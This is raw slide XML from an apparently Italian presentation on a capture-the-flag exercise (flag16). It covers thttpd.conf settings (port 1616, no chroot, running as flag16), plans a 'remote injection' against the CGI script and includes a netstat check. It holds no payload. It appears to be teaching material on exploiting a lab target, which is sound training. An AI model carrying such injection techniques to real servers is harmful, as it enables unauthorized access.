              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94474C4-EB34-530B-834A-AA00555D11B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405745" y="1119495"/>
            <a:ext cx="4738255" cy="402400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1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>ANALISI DI THTTPD.CONF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955092" y="1194684"/>
            <a:ext cx="7055790" cy="3779098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Analizzando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> otteniamo le seguenti informazioni:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port=1616: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>il server Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> ascolta sulla porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>1616</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir=/home/flag16: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>la directory radice del server Web è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1"/>
              <a:t>/home/flag16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nochroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>il server Web ha la conoscenza dell’intero file system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>dell’host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> (quindi anche il file eseguibile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1"/>
              <a:t>/bin/getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:srgbClr val="F99AAA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User=flag16: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>il server Web esegue con i diritti dell’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2656B2-2170-5321-7AC9-3BF310DAC4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493018" y="1811759"/>
            <a:ext cx="4157963" cy="369798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65715155-D516-8EB1-9EA1-4520C62F4EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1915521" y="2549428"/>
            <a:ext cx="5312958" cy="419444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FE5669-97BC-949D-A957-E50452C76FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429650" y="3477326"/>
            <a:ext cx="4284699" cy="390175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Immagine 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA0D7D0-3404-0E23-D6A8-8BA544F35386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223057" y="4228122"/>
            <a:ext cx="6687483" cy="381053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213038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41">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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41">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">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41">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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441">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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441">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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1"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="2433204"/>
            <a:ext cx="7313596" cy="1203614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="F99AAA"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>È</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> possibile effettuare una INIEZIONE REMOTA con lo stesso input dell’iniezione locale</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="F99AAA"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Prima di procedere, ci assicuriamo che il server sia effettivamente in ascolto sulla porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1"/>
              <a:t>1616</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>, attraverso il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ netstat –ntl | grep 1616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="1075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0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Dobbiamo cambiare strategia… effettivamente sembra esserci un’altra strada!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Oltre al file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> esiste anche il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>, analizziamolo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1F413D4-17D4-16F6-B906-FBFF1320DB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="57812"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="3791860"/>
            <a:ext cx="6420746" cy="341613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366506029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41">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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41">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">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441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
